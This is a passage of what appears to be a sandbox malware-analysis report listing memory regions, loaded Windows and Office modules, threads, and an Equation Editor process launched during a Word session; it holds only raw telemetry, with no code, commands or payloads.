"c:\\windows\\system32\\rpcrt4.dll") Region: id = 293 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 294 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 295 start_va = 0x75610000 end_va = 0x7580afff entry_point = 0x75610000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 296 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 297 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 298 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 299 start_va = 0x76490000 end_va = 0x765c5fff entry_point = 0x76490000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 300 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 301 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 302 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 303 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 304 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 305 start_va = 0x76910000 end_va = 0x76aacfff entry_point = 0x76910000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 306 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 307 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 308 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 309 start_va = 0x76cf0000 end_va = 0x76de4fff entry_point = 0x76cf0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 310 start_va = 0x76df0000 end_va = 0x76e34fff entry_point = 0x76df0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 311 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 312 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 313 start_va = 0x77110000 end_va = 0x77114fff entry_point = 0x77110000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 314 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 315 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 316 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 317 start_va = 0x7ff90000 end_va = 0x7ff9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff90000" filename = "" Region: id = 318 start_va = 0x7ffa0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffa0000" filename = "" Region: id = 319 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 320 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 321 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 322 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 323 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 324 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 325 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 326 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 327 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 328 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 329 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 330 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 331 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 332 start_va = 0x4e0000 end_va = 0x4eefff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 333 start_va = 0x700000 end_va = 0x703fff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 334 start_va = 0x710000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 335 start_va = 0x730000 end_va = 0x74efff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 336 start_va = 0x750000 end_va = 0x76efff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 337 start_va = 0xed0000 end_va = 0xed0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 338 start_va = 0xef0000 end_va = 0xf0efff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 339 start_va = 0xf10000 end_va = 0xf2efff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 340 start_va = 0xf30000 end_va = 0xf30fff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 341 start_va = 0x2110000 end_va = 0x212efff entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 342 start_va = 0x2130000 end_va = 0x214efff entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 343 start_va = 0x2180000 end_va = 0x219efff entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 344 start_va = 0x21c0000 end_va = 0x21defff entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 345 start_va = 0x21e0000 end_va = 0x21fdfff entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 346 start_va = 0x2270000 end_va = 0x228dfff entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 347 start_va = 0x2670000 end_va = 0x2690fff entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 348 start_va = 0x4b90000 end_va = 0x4c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 349 start_va = 0x75000000 end_va = 0x7505efff entry_point = 0x75000000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 350 start_va = 0x4d00000 end_va = 0x4d7ffff entry_point = 0x4d00000 region_type = mapped_file name = "~wrf{069f7e34-97bb-439a-a100-7bfb19244301}.tmp" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{069F7E34-97BB-439A-A100-7BFB19244301}.tmp" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.word\\~wrf{069f7e34-97bb-439a-a100-7bfb19244301}.tmp") Region: id = 351 start_va = 0x73740000 end_va = 0x73764fff entry_point = 0x73740000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 699 start_va = 0x2160000 end_va = 0x2161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002160000" filename = "" Region: id = 700 start_va = 0x2170000 end_va = 0x2171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002170000" filename = "" Region: id = 701 start_va = 0x4d80000 end_va = 0x4e4bfff entry_point = 0x4d80000 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 702 start_va = 0x4eb0000 end_va = 0x4f76fff entry_point = 0x4eb0000 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 703 start_va = 0x4f80000 end_va = 0x507ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f80000" filename = "" Region: id = 704 start_va = 0x721c0000 end_va = 0x7224bfff entry_point = 0x721c0000 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 705 start_va = 0x726e0000 end_va = 0x7271bfff entry_point = 0x726e0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 706 start_va = 0x21a0000 end_va = 0x21a0fff entry_point = 0x21a0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 707 start_va = 0x2200000 end_va = 0x2200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002200000" filename = "" Region: id = 708 start_va = 0x2390000 end_va = 0x23a1fff entry_point = 0x2390000 region_type = mapped_file name = "uiautomationcore.dll.mui" filename = "\\Windows\\System32\\en-US\\UIAutomationCore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\uiautomationcore.dll.mui") Region: id = 709 start_va = 0x81d0000 end_va = 0x8681fff entry_point = 0x0 region_type = private name = "private_0x00000000081d0000" filename = "" Region: id = 710 start_va = 0x6ee70000 end_va = 0x6ee78fff entry_point = 0x6ee70000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 711 start_va = 0x75570000 end_va = 0x75572fff entry_point = 0x75570000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 712 start_va = 0x6fe10000 end_va = 0x6fe7ffff entry_point = 0x6fe10000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 713 start_va = 0x74f40000 end_va = 0x74f58fff entry_point = 0x74f40000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 714 start_va = 0x6fe80000 end_va = 0x6fe8afff entry_point = 0x6fe80000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 715 start_va = 0x73460000 end_va = 0x73469fff entry_point = 0x73460000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 716 start_va = 0x74ca0000 end_va = 0x74cb6fff entry_point = 0x74ca0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 717 start_va = 0x74850000 end_va = 0x7488cfff entry_point = 0x74850000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 718 start_va = 0x3510000 end_va = 0x3510fff entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 719 start_va = 0x3520000 end_va = 0x3520fff entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 720 start_va = 0x3570000 end_va = 0x3571fff entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 721 start_va = 0x3580000 end_va = 0x3580fff entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 722 start_va = 0x3590000 end_va = 0x3591fff entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 723 start_va = 0x35a0000 end_va = 0x35a1fff entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 724 start_va = 0x35b0000 end_va = 0x35b1fff entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 725 start_va = 0x35c0000 end_va = 0x35c1fff entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 726 start_va = 0x36e0000 end_va = 0x36e1fff entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 727 start_va = 0x36f0000 end_va = 0x36f1fff entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 728 start_va = 0x3700000 end_va = 0x3701fff entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 729 start_va = 0x3710000 end_va = 0x3711fff entry_point = 0x0 region_type = private name = "private_0x0000000003710000" filename = "" Region: id = 730 start_va = 0x81d0000 end_va = 0x8597fff entry_point = 0x0 region_type = private name = "private_0x00000000081d0000" filename = "" Region: id = 731 start_va = 0x85a0000 end_va = 0x864afff entry_point = 0x85a0000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 732 start_va = 0x8690000 end_va = 0x8e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 733 start_va = 0x8e90000 end_va = 0x8f49fff entry_point = 0x8e90000 region_type = mapped_file name = "calibril.ttf" filename = "\\Windows\\Fonts\\CalibriL.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf") Region: id = 734 start_va = 0x6e510000 end_va = 0x6e541fff entry_point = 0x6e510000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 735 start_va = 0x730000 end_va = 0x760fff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 736 start_va = 0x3730000 end_va = 0x3731fff entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 737 start_va = 0x3760000 end_va = 0x3761fff entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 738 start_va = 0x3780000 end_va = 0x3781fff entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 739 start_va = 0x3820000 end_va = 0x3821fff entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 740 start_va = 0x3840000 end_va = 0x3841fff entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 741 start_va = 0x7230000 end_va = 0x732ffff entry_point = 0x0 region_type = private name = "private_0x0000000007230000" filename = "" Region: id = 742 start_va = 0x8f50000 end_va = 0x9020fff entry_point = 0x8f50000 region_type = mapped_file name = "calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 743 start_va = 0x9030000 end_va = 0x9100fff entry_point = 0x0 region_type = private name = "private_0x0000000009030000" filename = "" Region: id = 744 start_va = 0x722b0000 end_va = 0x722e6fff entry_point = 0x722b0000 region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\msproof7.dll" (normalized: "c:\\program files\\microsoft office\\office15\\msproof7.dll") Region: id = 745 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 746 start_va = 0x62cc0000 end_va = 0x63145fff entry_point = 0x62cc0000 region_type = mapped_file name = "msgr3en.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\PROOF\\1033\\MSGR3EN.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\proof\\1033\\msgr3en.dll") Region: id = 747 start_va = 0x43c0000 end_va = 0x43cffff entry_point = 0x0 region_type = private name = "private_0x00000000043c0000" filename = "" Region: id = 748 start_va = 0x7110000 end_va = 0x720ffff entry_point = 0x0 region_type = private name = "private_0x0000000007110000" filename = "" Region: id = 749 start_va = 0x7210000 end_va = 0x730ffff entry_point = 0x0 region_type = private name = "private_0x0000000007210000" filename = "" Region: id = 750 start_va = 0x7330000 end_va = 0x7481fff entry_point = 0x0 region_type = private name = "private_0x0000000007330000" filename = "" Region: id = 751 start_va = 0x91f0000 end_va = 0x92effff entry_point = 0x0 region_type = private name = "private_0x00000000091f0000" filename = "" Region: id = 752 start_va = 0x72130000 end_va = 0x721b9fff entry_point = 0x72130000 region_type = mapped_file name = "msspell7.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\PROOF\\msspell7.dll" (normalized: "c:\\program files\\microsoft office\\office15\\proof\\msspell7.dll") Region: id = 753 start_va = 0x7ff8f000 end_va = 0x7ff8ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff8f000" filename = "" Region: id = 754 start_va = 0xef0000 end_va = 0xf00fff entry_point = 0xef0000 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 755 start_va = 0xf10000 end_va = 0xf20fff entry_point = 0xf10000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 756 start_va = 0x2110000 end_va = 0x2140fff entry_point = 0x2110000 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 757 start_va = 0x2180000 end_va = 0x2190fff entry_point = 0x2180000 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 758 start_va = 0x21c0000 end_va = 0x21d0fff entry_point = 0x21c0000 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 759 start_va = 0x7490000 end_va = 0x758ffff entry_point = 0x0 region_type = private name = "private_0x0000000007490000" filename = "" Region: id = 760 start_va = 0x9460000 end_va = 0x946ffff entry_point = 0x0 region_type = private name = "private_0x0000000009460000" filename = "" Region: id = 761 start_va = 0x6f1b0000 end_va = 0x6f210fff entry_point = 0x6f1b0000 region_type = mapped_file name = "mscss7en.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\mscss7en.dll" (normalized: "c:\\program files\\microsoft office\\office15\\mscss7en.dll") Region: id = 762 start_va = 0x71fe0000 end_va = 0x7212bfff entry_point = 0x71fe0000 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files\\Microsoft Office\\Office15\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft office\\office15\\proof\\mssp7en.lex") Region: id = 763 start_va = 0x6eaf0000 end_va = 0x6eb6efff entry_point = 0x6eaf0000 region_type = mapped_file name = "css7data0009.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\CSS7DATA0009.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\css7data0009.dll") Region: id = 1858 start_va = 0x740000 end_va = 0x741fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 1859 start_va = 0x750000 end_va = 0x750fff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1860 start_va = 0x790000 end_va = 0x7c1fff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1861 start_va = 0x73740000 end_va = 0x73764fff entry_point = 0x73740000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1862 start_va = 0x73970000 end_va = 0x73978fff entry_point = 0x73970000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Thread: id = 1 os_tid = 0x998 Thread: id = 2 os_tid = 0x994 Thread: id = 3 os_tid = 0x990 Thread: id = 4 os_tid = 0x98c Thread: id = 5 os_tid = 0x988 Thread: id = 6 os_tid = 0x984 Thread: id = 7 os_tid = 0x978 Thread: id = 8 os_tid = 0x974 Thread: id = 9 os_tid = 0x970 Thread: id = 10 os_tid = 0x96c Thread: id = 11 os_tid = 0x968 Thread: id = 12 os_tid = 0x960 Thread: id = 45 os_tid = 0xa84 Thread: id = 46 os_tid = 0xa8c Thread: id = 48 os_tid = 0xaa0 Process: id = "2" image_name = "eqnedt32.exe" filename = "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x7f1e6680" os_pid = "0x9f4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x95c" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 352 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 353 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 354 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 355 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 356 start_va = 0x400000 end_va = 0x48dfff entry_point = 0x400000 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 357 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 358 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 359 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 360 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 361 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 362 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 363 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 364 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 365 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 366 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 367 start_va = 0x72290000 end_va = 0x72313fff entry_point = 0x72290000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 368 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 369 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 370 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 371 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 372 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 373 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 374 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 375 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 376 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = 